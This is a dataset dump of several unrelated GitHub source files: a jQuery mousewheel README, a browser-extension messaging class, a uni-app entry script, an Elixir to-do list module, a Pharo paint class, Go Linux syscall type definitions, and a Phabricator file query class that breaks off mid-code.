text
stringlengths 2
100k
| meta
dict |
---|---|
# jQuery Mouse Wheel Plugin
A [jQuery](http://jquery.com/) plugin that adds cross-browser mouse wheel support with delta normalization.
In order to use the plugin, simply bind the `mousewheel` event to an element.
It also provides two helper methods called `mousewheel` and `unmousewheel`
that act just like other event helper methods in jQuery.
The event object is updated with the normalized `deltaX` and `deltaY` properties.
In addition there is a new property on the event object called `deltaFactor`. Multiply
the `deltaFactor` by `deltaX` or `deltaY` to get the scroll distance that the browser
has reported.
Here is an example of using both the bind and helper method syntax:
```js
// using on
$('#my_elem').on('mousewheel', function(event) {
console.log(event.deltaX, event.deltaY, event.deltaFactor);
});
// using the event helper
$('#my_elem').mousewheel(function(event) {
console.log(event.deltaX, event.deltaY, event.deltaFactor);
});
```
The old behavior of adding three arguments (`delta`, `deltaX`, and `deltaY`) to the
event handler is now deprecated and will be removed in later releases.
## The Deltas...
The combination of Browsers, Operating Systems, and Devices offers a huge range of possible delta values. In fact, if the user
uses a trackpad and then a physical mouse wheel the delta values can differ wildly. This plugin normalizes those
values so you get a whole number starting at +-1 and going up in increments of +-1 according to the force or
acceleration that is used. This number has the potential to be in the thousands depending on the device.
Check out some of the data collected from users [here](http://mousewheeldatacollector.herokuapp.com/).
### Getting the scroll distance
In some use-cases we prefer to have the normalized delta but in others we want to know how far the browser should
scroll based on the user's input. This can be done by multiplying the `deltaFactor` by the `deltaX` or `deltaY`
event property to find the scroll distance the browser reported.
The `deltaFactor` property was added to the event object in 3.1.5 so that the actual reported delta value can be
extracted. This is a non-standard property.
## Using with [Browserify](http://browserify.org)
Support for browserify is baked in.
```bash
npm install jquery-mousewheel
npm install jquery-browserify
```
In your server-side node.js code:
```js
var express = require('express');
var app = express.createServer();
app.use(require('browserify')({
require : [ 'jquery-browserify', 'jquery-mousewheel' ]
}));
```
In your browser-side javascript:
```js
var $ = require('jquery-browserify');
require('jquery-mousewheel')($);
```
| {
"pile_set_name": "Github"
} |
/**
* Messager.
*/
class Messager {
/**
* Send message to "to" module(s).
*
* @param {String | Array} to module name(s)
* @param {String} title message title
* @param {Object} detail message detail
*
* @returns {Promise<Object>} receiver reply Promise
*/
static send(to, title, detail) {
// if "to" is string, convert it into array.
if (typeof to === "string") {
to = [to];
}
// Set object is not serializable, so construct an object to quickly check existence of receivers.
let receivers = {};
for (let receiver of to) {
receivers[receiver] = true;
}
return new Promise((resolve, reject) => {
chrome.runtime.sendMessage({ to: receivers, title: title, detail: detail }, result => {
if (chrome.runtime.lastError) {
reject(chrome.runtime.lastError);
} else {
resolve(result);
}
});
});
}
/**
* Send message to "to" module(s).
*
* @param {Number} tabId id of tab to send to
* @param {String | Array} to module name(s)
* @param {String} title message title
* @param {Object} detail message detail
*
* @returns {Promise<Object>} receiver reply Promise
*/
static sendToTab(tabId, to, title, detail) {
// if "to" is string, convert it into array.
if (typeof to === "string") {
to = [to];
}
// Set object is not serializable, so construct an object to quickly check existence of receivers.
let receivers = {};
for (let receiver of to) {
receivers[receiver] = true;
}
if (BROWSER_ENV === "chrome") {
// Chrome is using callback.
return new Promise((resolve, reject) => {
chrome.tabs.sendMessage(
tabId,
{ to: receivers, title: title, detail: detail },
result => {
if (chrome.runtime.lastError) {
reject(chrome.runtime.lastError);
} else {
resolve(result);
}
}
);
});
} else {
// Firefox is using Promise.
return browser.tabs.sendMessage(tabId, { to: receivers, title: title, detail: detail });
}
}
/**
* Start to receive messages.
*
* @param {String} receiver message receiver
* @param {Function} messageHandler message handler
*
* @returns {void} nothing
*/
static receive(receiver, messageHandler) {
chrome.runtime.onMessage.addListener((message, sender, callback) => {
if (message.to && message.to[receiver]) {
messageHandler(message, sender).then(result => {
if (callback) callback(result);
});
}
return true;
});
}
}
export default Messager;
| {
"pile_set_name": "Github"
} |
// App entry point: configures the shared request/upload helpers, the chat
// store, the custom event bus and the custom tabbar, then mounts the root
// Vue instance.
import Vue from 'vue'
import App from './App'
import {df} from './common/request/request-downFiles.js';
import rup from '@/common/request/request-upFiles.js';

Vue.config.productionTip = false;

// Download/request helper configuration.
// NOTE(review): "baseuUrl" looks like a typo for "baseUrl", but it must
// match the property name request-downFiles.js actually reads — confirm
// before renaming.
df.baseuUrl = 'https://www.easy-mock.com/mock/5ca6ec41215a7b66ff10343d/'
df.defaultReq.type = "POST";

// Helper used only by the commented-out beforeSend experiment below.
let timeout = function () {
    return new Promise(resolve => {
        setTimeout(() => {
            resolve();
        }, 3000)
    })
}
df.defaultReq.beforeSend = res => {
    // await timeout();
    // delete res.data
    return res;
}
// When a response reports failure, force the user back to the login page.
df.defaultReq.beforeFinish = (res, status) => {
    if (!res.data.success) { // log out
        uni.reLaunch({
            url: 'login?userOut=true'
        });
    }
    return null
}
df.defaultReq.errorHandler = (err, reject) => {
    console.log(err)
    reject(err);
}
// Common parameters: empty by default; once set, they are attached to
// every request.
df.defaultReq.baseData = {
    token: '000-000-000-000-player125'
}

// Upload helper configuration (test project).
rup.defaultUp.url = 'https://www.easy-mock.com/mock/5ca6ec41215a7b66ff10343d/'
// Common parameters attached to every upload request.
rup.defaultUp.baseData = {
    token: '000-000-000-000-defaultUp'
}

// Chat (test).
// import './common/chat/useSocket.js';
import store from "./common/chat/store.js";
Vue.prototype.$store = store;

// Custom event bus.
import event from './common/uni-app-customEvent/custom-event.js'
const Event = new event();
Vue.prototype.$event = Event;

// Custom tabbar.
import {draw} from './common/uni-app-tabbar/useTabbar.js'
Vue.prototype.$draw = draw;

Vue.prototype.$req = df;
Vue.prototype.$rup = rup;

// Fix: productionTip was previously assigned twice (here and at the top);
// the duplicate assignment has been removed.
App.mpType = 'app'

const app = new Vue({
    ...App,
    store,
})
app.$mount()
| {
"pile_set_name": "Github"
} |
defmodule Todo.List do
  @moduledoc """
  An in-memory to-do list. Entries are plain maps stored under an
  auto-incrementing integer `:id`, which is stamped onto each entry as it
  is added.
  """

  defstruct auto_id: 1, entries: %{}

  @doc "Builds a list from an enumerable of entries (defaults to empty)."
  def new(entries \\ []) do
    Enum.reduce(entries, %Todo.List{}, fn entry, acc -> add_entry(acc, entry) end)
  end

  @doc "Returns the number of entries in the list."
  def size(todo_list), do: map_size(todo_list.entries)

  @doc "Adds an entry, assigning it the next auto id."
  def add_entry(todo_list, entry) do
    id = todo_list.auto_id
    stamped = Map.put(entry, :id, id)

    %Todo.List{
      todo_list
      | entries: Map.put(todo_list.entries, id, stamped),
        auto_id: id + 1
    }
  end

  @doc "Returns all entries whose `:date` equals the given date."
  def entries(todo_list, date) do
    for {_id, entry} <- todo_list.entries, entry.date == date, do: entry
  end

  @doc "Replaces the stored entry that has the same id as `new_entry`."
  def update_entry(todo_list, %{} = new_entry) do
    update_entry(todo_list, new_entry.id, fn _ -> new_entry end)
  end

  @doc """
  Applies `updater_fun` to the entry with `entry_id`. Unknown ids leave
  the list unchanged.
  """
  def update_entry(todo_list, entry_id, updater_fun) do
    case todo_list.entries do
      %{^entry_id => old_entry} ->
        new_entry = updater_fun.(old_entry)
        %Todo.List{todo_list | entries: Map.put(todo_list.entries, new_entry.id, new_entry)}

      _ ->
        todo_list
    end
  end

  @doc "Removes the entry with the given id (no-op for unknown ids)."
  def delete_entry(todo_list, entry_id) do
    %Todo.List{todo_list | entries: Map.delete(todo_list.entries, entry_id)}
  end
end
| {
"pile_set_name": "Github"
} |
"
I am an abstract paint, which should be converted before it can be used by Athens.
I am backend agnostic, as opposed to concrete paint(s).
Also, any other object can play the role of paint, as long as it implements the conversion method, #asAthensPaintOn:
See other implementors of #asAthensPaintOn:, such as Color and Form.
"
Class {
#name : #AthensAbstractPaint,
#superclass : #Object,
#category : #'Athens-Core-Paints'
}
{ #category : #converting }
AthensAbstractPaint >> asAthensPaintOn: aCanvas [
	"Default conversion: answer the receiver itself. Objects playing the
	paint role implement this hook to build a backend-specific paint for
	aCanvas; here no conversion is performed."
	^ self
]
| {
"pile_set_name": "Github"
} |
// cgo -godefs -- -Wall -Werror -static -I/tmp/include linux/types.go | go run mkpost.go
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build mips64le,linux
package unix
const (
sizeofPtr = 0x8
sizeofShort = 0x2
sizeofInt = 0x4
sizeofLong = 0x8
sizeofLongLong = 0x8
PathMax = 0x1000
)
type (
_C_short int16
_C_int int32
_C_long int64
_C_long_long int64
)
type Timespec struct {
Sec int64
Nsec int64
}
type Timeval struct {
Sec int64
Usec int64
}
type Timex struct {
Modes uint32
Pad_cgo_0 [4]byte
Offset int64
Freq int64
Maxerror int64
Esterror int64
Status int32
Pad_cgo_1 [4]byte
Constant int64
Precision int64
Tolerance int64
Time Timeval
Tick int64
Ppsfreq int64
Jitter int64
Shift int32
Pad_cgo_2 [4]byte
Stabil int64
Jitcnt int64
Calcnt int64
Errcnt int64
Stbcnt int64
Tai int32
Pad_cgo_3 [44]byte
}
type Time_t int64
type Tms struct {
Utime int64
Stime int64
Cutime int64
Cstime int64
}
type Utimbuf struct {
Actime int64
Modtime int64
}
type Rusage struct {
Utime Timeval
Stime Timeval
Maxrss int64
Ixrss int64
Idrss int64
Isrss int64
Minflt int64
Majflt int64
Nswap int64
Inblock int64
Oublock int64
Msgsnd int64
Msgrcv int64
Nsignals int64
Nvcsw int64
Nivcsw int64
}
type Rlimit struct {
Cur uint64
Max uint64
}
type _Gid_t uint32
type Stat_t struct {
Dev uint32
Pad1 [3]uint32
Ino uint64
Mode uint32
Nlink uint32
Uid uint32
Gid uint32
Rdev uint32
Pad2 [3]uint32
Size int64
Atim Timespec
Mtim Timespec
Ctim Timespec
Blksize uint32
Pad4 uint32
Blocks int64
}
type Statfs_t struct {
Type int64
Bsize int64
Frsize int64
Blocks uint64
Bfree uint64
Files uint64
Ffree uint64
Bavail uint64
Fsid Fsid
Namelen int64
Flags int64
Spare [5]int64
}
type Dirent struct {
Ino uint64
Off int64
Reclen uint16
Type uint8
Name [256]int8
Pad_cgo_0 [5]byte
}
type Fsid struct {
X__val [2]int32
}
type Flock_t struct {
Type int16
Whence int16
Pad_cgo_0 [4]byte
Start int64
Len int64
Pid int32
Pad_cgo_1 [4]byte
}
type FscryptPolicy struct {
Version uint8
Contents_encryption_mode uint8
Filenames_encryption_mode uint8
Flags uint8
Master_key_descriptor [8]uint8
}
type FscryptKey struct {
Mode uint32
Raw [64]uint8
Size uint32
}
type KeyctlDHParams struct {
Private int32
Prime int32
Base int32
}
const (
FADV_NORMAL = 0x0
FADV_RANDOM = 0x1
FADV_SEQUENTIAL = 0x2
FADV_WILLNEED = 0x3
FADV_DONTNEED = 0x4
FADV_NOREUSE = 0x5
)
type RawSockaddrInet4 struct {
Family uint16
Port uint16
Addr [4]byte /* in_addr */
Zero [8]uint8
}
type RawSockaddrInet6 struct {
Family uint16
Port uint16
Flowinfo uint32
Addr [16]byte /* in6_addr */
Scope_id uint32
}
type RawSockaddrUnix struct {
Family uint16
Path [108]int8
}
type RawSockaddrLinklayer struct {
Family uint16
Protocol uint16
Ifindex int32
Hatype uint16
Pkttype uint8
Halen uint8
Addr [8]uint8
}
type RawSockaddrNetlink struct {
Family uint16
Pad uint16
Pid uint32
Groups uint32
}
type RawSockaddrHCI struct {
Family uint16
Dev uint16
Channel uint16
}
type RawSockaddrCAN struct {
Family uint16
Pad_cgo_0 [2]byte
Ifindex int32
Addr [8]byte
}
type RawSockaddrALG struct {
Family uint16
Type [14]uint8
Feat uint32
Mask uint32
Name [64]uint8
}
type RawSockaddrVM struct {
Family uint16
Reserved1 uint16
Port uint32
Cid uint32
Zero [4]uint8
}
type RawSockaddr struct {
Family uint16
Data [14]int8
}
type RawSockaddrAny struct {
Addr RawSockaddr
Pad [96]int8
}
type _Socklen uint32
type Linger struct {
Onoff int32
Linger int32
}
type Iovec struct {
Base *byte
Len uint64
}
type IPMreq struct {
Multiaddr [4]byte /* in_addr */
Interface [4]byte /* in_addr */
}
type IPMreqn struct {
Multiaddr [4]byte /* in_addr */
Address [4]byte /* in_addr */
Ifindex int32
}
type IPv6Mreq struct {
Multiaddr [16]byte /* in6_addr */
Interface uint32
}
type PacketMreq struct {
Ifindex int32
Type uint16
Alen uint16
Address [8]uint8
}
type Msghdr struct {
Name *byte
Namelen uint32
Pad_cgo_0 [4]byte
Iov *Iovec
Iovlen uint64
Control *byte
Controllen uint64
Flags int32
Pad_cgo_1 [4]byte
}
type Cmsghdr struct {
Len uint64
Level int32
Type int32
}
type Inet4Pktinfo struct {
Ifindex int32
Spec_dst [4]byte /* in_addr */
Addr [4]byte /* in_addr */
}
type Inet6Pktinfo struct {
Addr [16]byte /* in6_addr */
Ifindex uint32
}
type IPv6MTUInfo struct {
Addr RawSockaddrInet6
Mtu uint32
}
type ICMPv6Filter struct {
Data [8]uint32
}
type Ucred struct {
Pid int32
Uid uint32
Gid uint32
}
type TCPInfo struct {
State uint8
Ca_state uint8
Retransmits uint8
Probes uint8
Backoff uint8
Options uint8
Pad_cgo_0 [2]byte
Rto uint32
Ato uint32
Snd_mss uint32
Rcv_mss uint32
Unacked uint32
Sacked uint32
Lost uint32
Retrans uint32
Fackets uint32
Last_data_sent uint32
Last_ack_sent uint32
Last_data_recv uint32
Last_ack_recv uint32
Pmtu uint32
Rcv_ssthresh uint32
Rtt uint32
Rttvar uint32
Snd_ssthresh uint32
Snd_cwnd uint32
Advmss uint32
Reordering uint32
Rcv_rtt uint32
Rcv_space uint32
Total_retrans uint32
}
const (
SizeofSockaddrInet4 = 0x10
SizeofSockaddrInet6 = 0x1c
SizeofSockaddrAny = 0x70
SizeofSockaddrUnix = 0x6e
SizeofSockaddrLinklayer = 0x14
SizeofSockaddrNetlink = 0xc
SizeofSockaddrHCI = 0x6
SizeofSockaddrCAN = 0x10
SizeofSockaddrALG = 0x58
SizeofSockaddrVM = 0x10
SizeofLinger = 0x8
SizeofIovec = 0x10
SizeofIPMreq = 0x8
SizeofIPMreqn = 0xc
SizeofIPv6Mreq = 0x14
SizeofPacketMreq = 0x10
SizeofMsghdr = 0x38
SizeofCmsghdr = 0x10
SizeofInet4Pktinfo = 0xc
SizeofInet6Pktinfo = 0x14
SizeofIPv6MTUInfo = 0x20
SizeofICMPv6Filter = 0x20
SizeofUcred = 0xc
SizeofTCPInfo = 0x68
)
const (
IFA_UNSPEC = 0x0
IFA_ADDRESS = 0x1
IFA_LOCAL = 0x2
IFA_LABEL = 0x3
IFA_BROADCAST = 0x4
IFA_ANYCAST = 0x5
IFA_CACHEINFO = 0x6
IFA_MULTICAST = 0x7
IFLA_UNSPEC = 0x0
IFLA_ADDRESS = 0x1
IFLA_BROADCAST = 0x2
IFLA_IFNAME = 0x3
IFLA_MTU = 0x4
IFLA_LINK = 0x5
IFLA_QDISC = 0x6
IFLA_STATS = 0x7
IFLA_COST = 0x8
IFLA_PRIORITY = 0x9
IFLA_MASTER = 0xa
IFLA_WIRELESS = 0xb
IFLA_PROTINFO = 0xc
IFLA_TXQLEN = 0xd
IFLA_MAP = 0xe
IFLA_WEIGHT = 0xf
IFLA_OPERSTATE = 0x10
IFLA_LINKMODE = 0x11
IFLA_LINKINFO = 0x12
IFLA_NET_NS_PID = 0x13
IFLA_IFALIAS = 0x14
IFLA_MAX = 0x2b
RT_SCOPE_UNIVERSE = 0x0
RT_SCOPE_SITE = 0xc8
RT_SCOPE_LINK = 0xfd
RT_SCOPE_HOST = 0xfe
RT_SCOPE_NOWHERE = 0xff
RT_TABLE_UNSPEC = 0x0
RT_TABLE_COMPAT = 0xfc
RT_TABLE_DEFAULT = 0xfd
RT_TABLE_MAIN = 0xfe
RT_TABLE_LOCAL = 0xff
RT_TABLE_MAX = 0xffffffff
RTA_UNSPEC = 0x0
RTA_DST = 0x1
RTA_SRC = 0x2
RTA_IIF = 0x3
RTA_OIF = 0x4
RTA_GATEWAY = 0x5
RTA_PRIORITY = 0x6
RTA_PREFSRC = 0x7
RTA_METRICS = 0x8
RTA_MULTIPATH = 0x9
RTA_FLOW = 0xb
RTA_CACHEINFO = 0xc
RTA_TABLE = 0xf
RTN_UNSPEC = 0x0
RTN_UNICAST = 0x1
RTN_LOCAL = 0x2
RTN_BROADCAST = 0x3
RTN_ANYCAST = 0x4
RTN_MULTICAST = 0x5
RTN_BLACKHOLE = 0x6
RTN_UNREACHABLE = 0x7
RTN_PROHIBIT = 0x8
RTN_THROW = 0x9
RTN_NAT = 0xa
RTN_XRESOLVE = 0xb
RTNLGRP_NONE = 0x0
RTNLGRP_LINK = 0x1
RTNLGRP_NOTIFY = 0x2
RTNLGRP_NEIGH = 0x3
RTNLGRP_TC = 0x4
RTNLGRP_IPV4_IFADDR = 0x5
RTNLGRP_IPV4_MROUTE = 0x6
RTNLGRP_IPV4_ROUTE = 0x7
RTNLGRP_IPV4_RULE = 0x8
RTNLGRP_IPV6_IFADDR = 0x9
RTNLGRP_IPV6_MROUTE = 0xa
RTNLGRP_IPV6_ROUTE = 0xb
RTNLGRP_IPV6_IFINFO = 0xc
RTNLGRP_IPV6_PREFIX = 0x12
RTNLGRP_IPV6_RULE = 0x13
RTNLGRP_ND_USEROPT = 0x14
SizeofNlMsghdr = 0x10
SizeofNlMsgerr = 0x14
SizeofRtGenmsg = 0x1
SizeofNlAttr = 0x4
SizeofRtAttr = 0x4
SizeofIfInfomsg = 0x10
SizeofIfAddrmsg = 0x8
SizeofRtMsg = 0xc
SizeofRtNexthop = 0x8
)
type NlMsghdr struct {
Len uint32
Type uint16
Flags uint16
Seq uint32
Pid uint32
}
type NlMsgerr struct {
Error int32
Msg NlMsghdr
}
type RtGenmsg struct {
Family uint8
}
type NlAttr struct {
Len uint16
Type uint16
}
type RtAttr struct {
Len uint16
Type uint16
}
type IfInfomsg struct {
Family uint8
X__ifi_pad uint8
Type uint16
Index int32
Flags uint32
Change uint32
}
type IfAddrmsg struct {
Family uint8
Prefixlen uint8
Flags uint8
Scope uint8
Index uint32
}
type RtMsg struct {
Family uint8
Dst_len uint8
Src_len uint8
Tos uint8
Table uint8
Protocol uint8
Scope uint8
Type uint8
Flags uint32
}
type RtNexthop struct {
Len uint16
Flags uint8
Hops uint8
Ifindex int32
}
const (
SizeofSockFilter = 0x8
SizeofSockFprog = 0x10
)
type SockFilter struct {
Code uint16
Jt uint8
Jf uint8
K uint32
}
type SockFprog struct {
Len uint16
Pad_cgo_0 [6]byte
Filter *SockFilter
}
type InotifyEvent struct {
Wd int32
Mask uint32
Cookie uint32
Len uint32
}
const SizeofInotifyEvent = 0x10
type PtraceRegs struct {
Regs [32]uint64
Lo uint64
Hi uint64
Epc uint64
Badvaddr uint64
Status uint64
Cause uint64
}
type FdSet struct {
Bits [16]int64
}
type Sysinfo_t struct {
Uptime int64
Loads [3]uint64
Totalram uint64
Freeram uint64
Sharedram uint64
Bufferram uint64
Totalswap uint64
Freeswap uint64
Procs uint16
Pad uint16
Pad_cgo_0 [4]byte
Totalhigh uint64
Freehigh uint64
Unit uint32
X_f [0]int8
Pad_cgo_1 [4]byte
}
type Utsname struct {
Sysname [65]int8
Nodename [65]int8
Release [65]int8
Version [65]int8
Machine [65]int8
Domainname [65]int8
}
type Ustat_t struct {
Tfree int32
Pad_cgo_0 [4]byte
Tinode uint64
Fname [6]int8
Fpack [6]int8
Pad_cgo_1 [4]byte
}
type EpollEvent struct {
Events uint32
Fd int32
Pad int32
}
const (
AT_FDCWD = -0x64
AT_REMOVEDIR = 0x200
AT_SYMLINK_FOLLOW = 0x400
AT_SYMLINK_NOFOLLOW = 0x100
)
type PollFd struct {
Fd int32
Events int16
Revents int16
}
const (
POLLIN = 0x1
POLLPRI = 0x2
POLLOUT = 0x4
POLLRDHUP = 0x2000
POLLERR = 0x8
POLLHUP = 0x10
POLLNVAL = 0x20
)
type Sigset_t struct {
X__val [16]uint64
}
const RNDGETENTCNT = 0x40045200
const PERF_IOC_FLAG_GROUP = 0x1
const _SC_PAGESIZE = 0x1e
type Termios struct {
Iflag uint32
Oflag uint32
Cflag uint32
Lflag uint32
Line uint8
Cc [23]uint8
Ispeed uint32
Ospeed uint32
}
type Winsize struct {
Row uint16
Col uint16
Xpixel uint16
Ypixel uint16
}
| {
"pile_set_name": "Github"
} |
<?php
/**
 * Policy-aware, cursor-paged query for loading PhabricatorFile objects.
 *
 * Beyond the usual id/phid/author constraints, files can be selected by
 * content hash, byte-size range, name, storage engine, builtin status,
 * partial/deleted flags, and by being a transform (e.g. a thumbnail) of
 * another file. loadPage() additionally attaches the objects a file is
 * associated with, because file visibility is derived from them.
 */
final class PhabricatorFileQuery
  extends PhabricatorCursorPagedPolicyAwareQuery {

  private $ids;
  private $phids;
  private $authorPHIDs;
  private $explicitUploads;
  private $transforms;
  private $dateCreatedAfter;
  private $dateCreatedBefore;
  private $contentHashes;
  private $minLength;
  private $maxLength;
  private $names;
  private $isPartial;
  private $isDeleted;
  private $needTransforms;
  private $builtinKeys;
  private $isBuiltin;
  private $storageEngines;

  public function withIDs(array $ids) {
    $this->ids = $ids;
    return $this;
  }

  public function withPHIDs(array $phids) {
    $this->phids = $phids;
    return $this;
  }

  public function withAuthorPHIDs(array $phids) {
    $this->authorPHIDs = $phids;
    return $this;
  }

  // Epoch timestamp (inclusive upper bound on dateCreated).
  public function withDateCreatedBefore($date_created_before) {
    $this->dateCreatedBefore = $date_created_before;
    return $this;
  }

  // Epoch timestamp (inclusive lower bound on dateCreated).
  public function withDateCreatedAfter($date_created_after) {
    $this->dateCreatedAfter = $date_created_after;
    return $this;
  }

  public function withContentHashes(array $content_hashes) {
    $this->contentHashes = $content_hashes;
    return $this;
  }

  public function withBuiltinKeys(array $keys) {
    $this->builtinKeys = $keys;
    return $this;
  }

  // Pass true to select only builtin files, false to exclude them.
  public function withIsBuiltin($is_builtin) {
    $this->isBuiltin = $is_builtin;
    return $this;
  }

  /**
   * Select files which are transformations of some other file. For example,
   * you can use this query to find previously generated thumbnails of an image
   * file.
   *
   * As a parameter, provide a list of transformation specifications. Each
   * specification is a dictionary with the keys `originalPHID` and `transform`.
   * The `originalPHID` is the PHID of the original file (the file which was
   * transformed) and the `transform` is the name of the transform to query
   * for. If you pass `true` as the `transform`, all transformations of the
   * file will be selected.
   *
   * For example:
   *
   *   array(
   *     array(
   *       'originalPHID' => 'PHID-FILE-aaaa',
   *       'transform'    => 'sepia',
   *     ),
   *     array(
   *       'originalPHID' => 'PHID-FILE-bbbb',
   *       'transform'    => true,
   *     ),
   *   )
   *
   * This selects the `"sepia"` transformation of the file with PHID
   * `PHID-FILE-aaaa` and all transformations of the file with PHID
   * `PHID-FILE-bbbb`.
   *
   * @param list<dict> List of transform specifications, described above.
   * @return this
   */
  public function withTransforms(array $specs) {
    foreach ($specs as $spec) {
      if (!is_array($spec) ||
          empty($spec['originalPHID']) ||
          empty($spec['transform'])) {
        throw new Exception(
          pht(
            "Transform specification must be a dictionary with keys ".
            "'%s' and '%s'!",
            'originalPHID',
            'transform'));
      }
    }
    $this->transforms = $specs;
    return $this;
  }

  // Constrain file size to [$min, $max] bytes; either bound may be null.
  public function withLengthBetween($min, $max) {
    $this->minLength = $min;
    $this->maxLength = $max;
    return $this;
  }

  public function withNames(array $names) {
    $this->names = $names;
    return $this;
  }

  public function withIsPartial($partial) {
    $this->isPartial = $partial;
    return $this;
  }

  public function withIsDeleted($deleted) {
    $this->isDeleted = $deleted;
    return $this;
  }

  // Substring search on file names via the ngram index.
  public function withNameNgrams($ngrams) {
    return $this->withNgramsConstraint(
      id(new PhabricatorFileNameNgrams()),
      $ngrams);
  }

  public function withStorageEngines(array $engines) {
    $this->storageEngines = $engines;
    return $this;
  }

  public function showOnlyExplicitUploads($explicit_uploads) {
    $this->explicitUploads = $explicit_uploads;
    return $this;
  }

  // Request that the listed transforms be loaded and attached to each
  // result (see didFilterPage()).
  public function needTransforms(array $transforms) {
    $this->needTransforms = $transforms;
    return $this;
  }

  public function newResultObject() {
    return new PhabricatorFile();
  }

  protected function loadPage() {
    $files = $this->loadStandardPage($this->newResultObject());
    if (!$files) {
      return $files;
    }

    // Figure out which files we need to load attached objects for. In most
    // cases, we need to load attached objects to perform policy checks for
    // files.

    // However, in some special cases where we know files will always be
    // visible, we skip this. See T8478 and T13106.
    $need_objects = array();
    $need_xforms = array();
    foreach ($files as $file) {
      $always_visible = false;

      if ($file->getIsProfileImage()) {
        $always_visible = true;
      }

      if ($file->isBuiltin()) {
        $always_visible = true;
      }

      if ($always_visible) {
        // We just treat these files as though they aren't attached to
        // anything. This saves a query in common cases when we're loading
        // profile images or builtins. We could be slightly more nuanced
        // about this and distinguish between "not attached to anything" and
        // "might be attached but policy checks don't need to care".
        $file->attachObjectPHIDs(array());
        continue;
      }

      $need_objects[] = $file;
      $need_xforms[] = $file;
    }

    $viewer = $this->getViewer();
    $is_omnipotent = $viewer->isOmnipotent();

    // If we have any files left which do need objects, load the edges now.
    $object_phids = array();
    if ($need_objects) {
      $edge_type = PhabricatorFileHasObjectEdgeType::EDGECONST;
      $file_phids = mpull($need_objects, 'getPHID');

      $edges = id(new PhabricatorEdgeQuery())
        ->withSourcePHIDs($file_phids)
        ->withEdgeTypes(array($edge_type))
        ->execute();

      foreach ($need_objects as $file) {
        $phids = array_keys($edges[$file->getPHID()][$edge_type]);
        $file->attachObjectPHIDs($phids);

        if ($is_omnipotent) {
          // If the viewer is omnipotent, we don't need to load the associated
          // objects either since the viewer can certainly see the object.
          // Skipping this can improve performance and prevent cycles. This
          // could possibly become part of the profile/builtin code above which
          // short circuits attachment policy checks in cases where we know
          // them to be unnecessary.
          continue;
        }

        foreach ($phids as $phid) {
          $object_phids[$phid] = true;
        }
      }
    }

    // If this file is a transform of another file, load that file too. If you
    // can see the original file, you can see the thumbnail.

    // TODO: It might be nice to put this directly on PhabricatorFile and
    // remove the PhabricatorTransformedFile table, which would be a little
    // simpler.
    if ($need_xforms) {
      $xforms = id(new PhabricatorTransformedFile())->loadAllWhere(
        'transformedPHID IN (%Ls)',
        mpull($need_xforms, 'getPHID'));
      $xform_phids = mpull($xforms, 'getOriginalPHID', 'getTransformedPHID');
      foreach ($xform_phids as $derived_phid => $original_phid) {
        $object_phids[$original_phid] = true;
      }
    } else {
      $xform_phids = array();
    }

    $object_phids = array_keys($object_phids);

    // Now, load the objects.
    $objects = array();
    if ($object_phids) {
      // NOTE: We're explicitly turning policy exceptions off, since the rule
      // here is "you can see the file if you can see ANY associated object".
      // Without this explicit flag, we'll incorrectly throw unless you can
      // see ALL associated objects.
      $objects = id(new PhabricatorObjectQuery())
        ->setParentQuery($this)
        ->setViewer($this->getViewer())
        ->withPHIDs($object_phids)
        ->setRaisePolicyExceptions(false)
        ->execute();
      $objects = mpull($objects, null, 'getPHID');
    }

    foreach ($files as $file) {
      $file_objects = array_select_keys($objects, $file->getObjectPHIDs());
      $file->attachObjects($file_objects);
    }

    foreach ($files as $key => $file) {
      $original_phid = idx($xform_phids, $file->getPHID());
      if ($original_phid == PhabricatorPHIDConstants::PHID_VOID) {
        // This is a special case for builtin files, which are handled
        // oddly.
        $original = null;
      } else if ($original_phid) {
        $original = idx($objects, $original_phid);
        if (!$original) {
          // If the viewer can't see the original file, also prevent them from
          // seeing the transformed file.
          $this->didRejectResult($file);
          unset($files[$key]);
          continue;
        }
      } else {
        $original = null;
      }
      $file->attachOriginalFile($original);
    }

    return $files;
  }

  protected function didFilterPage(array $files) {
    // Attach the transforms requested via needTransforms(), keyed by
    // transform name; missing transforms attach as null.
    $xform_keys = $this->needTransforms;
    if ($xform_keys !== null) {
      $xforms = id(new PhabricatorTransformedFile())->loadAllWhere(
        'originalPHID IN (%Ls) AND transform IN (%Ls)',
        mpull($files, 'getPHID'),
        $xform_keys);

      // $xfiles is only read inside the loop below, which only runs when
      // $xforms is nonempty — so the conditional definition is safe.
      if ($xforms) {
        $xfiles = id(new PhabricatorFile())->loadAllWhere(
          'phid IN (%Ls)',
          mpull($xforms, 'getTransformedPHID'));
        $xfiles = mpull($xfiles, null, 'getPHID');
      }

      $xform_map = array();
      foreach ($xforms as $xform) {
        $xfile = idx($xfiles, $xform->getTransformedPHID());
        if (!$xfile) {
          continue;
        }
        $original_phid = $xform->getOriginalPHID();
        $xform_key = $xform->getTransform();
        $xform_map[$original_phid][$xform_key] = $xfile;
      }

      $default_xforms = array_fill_keys($xform_keys, null);

      foreach ($files as $file) {
        $file_xforms = idx($xform_map, $file->getPHID(), array());
        $file_xforms += $default_xforms;
        $file->attachTransforms($file_xforms);
      }
    }

    return $files;
  }

  protected function buildJoinClauseParts(AphrontDatabaseConnection $conn) {
    $joins = parent::buildJoinClauseParts($conn);

    // The transform constraint matches against the transformed-file table,
    // joined as "t".
    if ($this->transforms) {
      $joins[] = qsprintf(
        $conn,
        'JOIN %T t ON t.transformedPHID = f.phid',
        id(new PhabricatorTransformedFile())->getTableName());
    }

    return $joins;
  }

  protected function buildWhereClauseParts(AphrontDatabaseConnection $conn) {
    $where = parent::buildWhereClauseParts($conn);

    if ($this->ids !== null) {
      $where[] = qsprintf(
        $conn,
        'f.id IN (%Ld)',
        $this->ids);
    }

    if ($this->phids !== null) {
      $where[] = qsprintf(
        $conn,
        'f.phid IN (%Ls)',
        $this->phids);
    }

    if ($this->authorPHIDs !== null) {
      $where[] = qsprintf(
        $conn,
        'f.authorPHID IN (%Ls)',
        $this->authorPHIDs);
    }

    if ($this->explicitUploads !== null) {
      $where[] = qsprintf(
        $conn,
        'f.isExplicitUpload = %d',
        (int)$this->explicitUploads);
    }

    if ($this->transforms !== null) {
      $clauses = array();
      foreach ($this->transforms as $transform) {
        // A `transform` of true matches any transform of the original.
        if ($transform['transform'] === true) {
          $clauses[] = qsprintf(
            $conn,
            '(t.originalPHID = %s)',
            $transform['originalPHID']);
        } else {
          $clauses[] = qsprintf(
            $conn,
            '(t.originalPHID = %s AND t.transform = %s)',
